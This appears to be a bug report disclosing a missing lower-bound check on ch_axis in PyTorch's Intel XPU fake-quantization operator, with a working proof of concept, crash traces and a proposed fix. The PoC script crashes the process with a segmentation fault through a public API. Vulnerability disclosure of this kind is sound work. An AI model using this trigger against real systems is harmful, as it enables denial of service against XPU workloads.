Bound check in fused_moving_avg_obs_fake_quant_xpu #3963

@chuanqi129

Description

The Intel XPU implementation of fused_moving_avg_obs_fake_quant_xpu validates only the upper bound of ch_axis:

TORCH_CHECK(
    ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be < "
    "self.dim()");

However, in the per_row_fq path, the same value is later used as an index into a native DimVector:

auto res = DimVector(x.sizes());
std::iota(res.begin(), res.end(), 0);
res[ch_axis] = 0;
res[0] = ch_axis;

y = x.permute(res);

There is no lower-bound validation such as:

ch_axis >= 0

or canonicalization through a dimension-wrapping helper such as maybe_wrap_dim.

Because the check has no lower bound, every negative ch_axis passes it (ch_axis < x.dim()), and res[ch_axis] then indexes outside the DimVector in native C++ code in the XPU backend. In testing, a large negative ch_axis causes a deterministic segmentation fault in libtorch_xpu.so.
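The gap can be illustrated with a small pure-Python model of the two predicates. This is only a sketch: the function names are hypothetical, and nothing here calls into PyTorch or the XPU backend. It simply shows which ch_axis values the upper-bound-only check accepts compared with a full range check.

```python
def passes_existing_check(ch_axis: int, ndim: int) -> bool:
    """Model of the current check: only the upper bound is tested."""
    return ch_axis < ndim


def is_valid_index(ch_axis: int, ndim: int) -> bool:
    """Model of what is needed to index a container of length ndim safely."""
    return 0 <= ch_axis < ndim


ndim = 1  # the PoC tensor is one-dimensional
for ch_axis in (0, 1, -1, -1250999896764):
    print(
        f"ch_axis={ch_axis}: "
        f"passes existing check={passes_existing_check(ch_axis, ndim)}, "
        f"valid index={is_valid_index(ch_axis, ndim)}"
    )
```

Every negative value is accepted by the first predicate and rejected by the second, which is the window the PoC below exploits.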

This is reachable from public Python APIs in the Intel XPU PyTorch wheel.

Proof of Concept

The following commands create a clean virtual environment, install the Intel XPU PyTorch wheel, write the PoC from the terminal, and run it.

set -euo pipefail

mkdir -p ~/intel-xpu-research
python3 -m venv ~/venvs/torch-xpu-wheel
source ~/venvs/torch-xpu-wheel/bin/activate

python -m pip install --upgrade pip setuptools wheel

# Install PyTorch / torchvision / torchaudio XPU wheels.
pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/xpu

# Optional sanity check: verify that the Intel XPU backend is visible.
python - <<'PY'
import torch
print("torch:", torch.__version__)
print("xpu available:", torch.xpu.is_available())
if torch.xpu.is_available():
    print("xpu device:", torch.xpu.get_device_name(0))
PY

# Write the PoC from the terminal.
cat > ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py <<'PY'
import os
import torch

print("torch:", torch.__version__, flush=True)
print("torch file:", torch.__file__, flush=True)
print("xpu available:", torch.xpu.is_available(), flush=True)
print("xpu device:", torch.xpu.get_device_name(0), flush=True)
print("LD_LIBRARY_PATH:", os.environ.get("LD_LIBRARY_PATH", ""), flush=True)

device = "xpu"

x = torch.full((1,), 0.5, device=device, dtype=torch.float64)
observer_on = torch.full((1,), 1, device=device, dtype=torch.int32)
fake_quant_on = torch.full((1,), 1, device=device, dtype=torch.int64)
running_min = torch.full((1,), 0.5, device=device, dtype=torch.float64)
running_max = torch.full((1,), 0.5, device=device, dtype=torch.float64)
scale = torch.full((1,), 0.5, device=device, dtype=torch.float64)
zero_point = torch.full((1,), 0.5, device=device, dtype=torch.float64)

print("calling public torch.fused_moving_avg_obs_fake_quant", flush=True)

out = torch.fused_moving_avg_obs_fake_quant(
    x,
    observer_on,
    fake_quant_on,
    running_min,
    running_max,
    scale,
    zero_point,
    0.0,
    0,
    0,
    -1250999896764,
    True,
    True,
)

torch.xpu.synchronize()
print("returned:", out, flush=True)
PY

# Run the PoC with a clean dynamic-library environment.
env -u LD_LIBRARY_PATH -u LD_PRELOAD -u SYCL_PI_TRACE \
PYTHONFAULTHANDLER=1 \
TORCH_SHOW_CPP_STACKTRACES=1 \
TORCH_DISABLE_ADDR2LINE=1 \
MALLOC_CHECK_=3 \
MALLOC_PERTURB_=165 \
ONEAPI_DEVICE_SELECTOR=level_zero:gpu \
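python ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py || rc=$?

# With `set -e`, a failing command would abort the script before the echo, so the status is captured above.
echo "exit code: ${rc:-0}"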

The process crashes with a segmentation fault:

torch: 2.9.1+xpu
xpu available: True
xpu device: Intel(R) Graphics [0x7d67]
LD_LIBRARY_PATH:

Fatal Python error: Segmentation fault

Current thread ... [python] (most recent call first):
  File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 19 in run_case
  File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 103 in <module>

Current thread's C stack trace:
  ...
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x616d2df
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x62043f7
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x6204491
  Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::redispatch(...)
  Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::call(...)
  ...

Segmentation fault
exit code: 139

The same crash was also reproduced through the helper-path operator with:

torch._fused_moving_avg_obs_fq_helper(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=False)

and through the public operator with:

torch.fused_moving_avg_obs_fake_quant(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=True)

Both crashed with exit code 139 and stack frames in libtorch_xpu.so.
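When triaging crashes like this, it can help to run each case in a child process so that the segmentation fault does not take down the driver script. The following is a minimal sketch, not part of the original report: describe_exit and run_isolated are hypothetical helper names. It relies on subprocess reporting death by signal as a negative return code, while a POSIX shell reports the same event as 128 plus the signal number (139 for SIGSEGV).

```python
import signal
import subprocess
import sys


def describe_exit(returncode: int) -> str:
    """Translate a child exit status into a readable description."""
    if returncode < 0:
        # subprocess reports death-by-signal as the negated signal number.
        return f"killed by {signal.Signals(-returncode).name}"
    if returncode > 128:
        # POSIX shells report death-by-signal as 128 + signal number.
        try:
            name = signal.Signals(returncode - 128).name
            return f"shell-style status for {name}"
        except ValueError:
            pass  # not a known signal number; treat as a plain exit status
    return f"exited with status {returncode}"


def run_isolated(script_path: str, timeout: float = 120.0) -> str:
    """Run a script in a fresh interpreter and describe how it ended."""
    proc = subprocess.run([sys.executable, script_path], timeout=timeout)
    return describe_exit(proc.returncode)


# Example (path is the PoC written earlier; adjust as needed):
# print(run_isolated("poc_fused_obs_xpu_huge_negative.py"))
```

With this wrapper, a crash in the child shows up as a string such as "killed by SIGSEGV" in the parent instead of terminating it.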

Impact

A caller who can execute PyTorch code in a process using the Intel XPU backend can crash the process by passing a crafted negative ch_axis to the public fake-quantization operator.

In particular:

Native segmentation fault in libtorch_xpu.so
Process termination / denial of service
Potential memory corruption due to unchecked native indexing
Affects public Python API usage, not only internal C++ calls

Recommended solution

Add explicit lower-bound validation or canonicalization for ch_axis before it is used.

For example:

TORCH_CHECK(
    ch_axis >= 0 && ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be >= 0 and < self.dim()");
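The two options mentioned above (strict validation versus canonicalization) differ in how they treat small negative axes such as -1. The pure-Python sketch below models both under stated assumptions: check_strict mirrors the TORCH_CHECK shown above, while wrap_dim is a hypothetical model of a dimension-wrapping helper that accepts values in [-ndim, ndim - 1] and maps negatives to ndim + ch_axis. It assumes ndim >= 1 and is not the actual ATen implementation.

```python
def check_strict(ch_axis: int, ndim: int) -> int:
    """Option 1: reject anything outside [0, ndim)."""
    if not (0 <= ch_axis < ndim):
        raise ValueError(
            f"ch_axis must be >= 0 and < self.dim() ({ndim}), got {ch_axis}"
        )
    return ch_axis


def wrap_dim(ch_axis: int, ndim: int) -> int:
    """Option 2: accept [-ndim, ndim - 1] and canonicalize negatives."""
    if not (-ndim <= ch_axis < ndim):
        raise IndexError(
            f"ch_axis out of range [{-ndim}, {ndim - 1}], got {ch_axis}"
        )
    return ch_axis + ndim if ch_axis < 0 else ch_axis


def channel_first_permutation(ch_axis: int, ndim: int) -> list:
    """Model of the per-row path: swap ch_axis with dimension 0."""
    perm = list(range(ndim))
    perm[ch_axis] = 0
    perm[0] = ch_axis
    return perm


# Both options reject the PoC value; only canonicalization accepts -1.
for validate in (check_strict, wrap_dim):
    for ch_axis in (2, -1, -1250999896764):
        try:
            axis = validate(ch_axis, 3)
            print(validate.__name__, ch_axis, channel_first_permutation(axis, 3))
        except (ValueError, IndexError) as exc:
            print(validate.__name__, ch_axis, "rejected:", exc)
```

Either option closes the out-of-bounds access. Which one is preferable depends on whether negative axes are meant to be supported by this operator, which the report does not state.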
